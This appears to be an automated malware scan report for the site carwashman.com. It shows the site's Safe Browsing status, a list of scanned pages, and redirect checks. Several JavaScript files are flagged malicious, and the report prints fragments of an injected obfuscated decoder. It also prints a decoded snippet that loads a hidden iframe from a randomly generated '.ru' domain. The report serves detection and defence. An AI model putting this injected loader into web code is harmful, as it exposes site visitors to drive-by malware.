Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=carwashman.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.carwashman.com/ | 200 OK Content-Length: 7013 Content-Type: text/html | clean |
http://www.carwashman.com/javascripts/jquery.js | 200 OK Content-Length: 108950 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 Antivirus reports:
| ||
http://www.carwashman.com/javascripts/jquery.superfish.js | 200 OK Content-Length: 9659 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 Antivirus reports:
| ||
http://www.carwashman.com/javascripts/swfobject.js | 200 OK Content-Length: 21919 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 Decoded script: /** * SWFObject v1.5: Flash Player detection and embed - http://blog.deconcept.com/swfobject/ * * SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License: * http://www.opensource.org/licenses/mit-license.php * */ if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFO var b = generatePseudoRandomString(a, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + b + "/runforestrun?sid=cxx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 2000 */ Antivirus reports:
| ||
http://www.carwashman.com/javascripts/lib.js | 200 OK Content-Length: 12397 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 Antivirus reports:
| ||
http://www.carwashman.com/durashiner.html | 200 OK Content-Length: 7231 Content-Type: text/html | clean |
http://www.carwashman.com/durashiner2.html | 200 OK Content-Length: 7223 Content-Type: text/html | clean |
http://www.carwashman.com/durashiner3.html | 200 OK Content-Length: 7223 Content-Type: text/html | clean |
http://www.carwashman.com/index.html | 200 OK Content-Length: 7013 Content-Type: text/html | clean |
http://www.carwashman.com/whyindy.html | 200 OK Content-Length: 6887 Content-Type: text/html | clean |
http://www.carwashman.com/whybelanger.html | 200 OK Content-Length: 6875 Content-Type: text/html | clean |
http://www.carwashman.com/videotour.html | 200 OK Content-Length: 7263 Content-Type: text/html | clean |
http://www.carwashman.com/videotour2.html | 200 OK Content-Length: 7255 Content-Type: text/html | clean |
http://www.carwashman.com/videotour3.html | 200 OK Content-Length: 7255 Content-Type: text/html | clean |
http://www.carwashman.com/videotour4.html | 200 OK Content-Length: 7285 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: carwashman.com
Result:
GET / HTTP/1.1
Host: carwashman.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: carwashman.com
Referer: http://www.google.com/search?q=carwashman.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: carwashman.com
Referer: http://www.google.com/search?q=carwashman.com
Result:
The result is similar to the first query. There are no suspicious redirects found.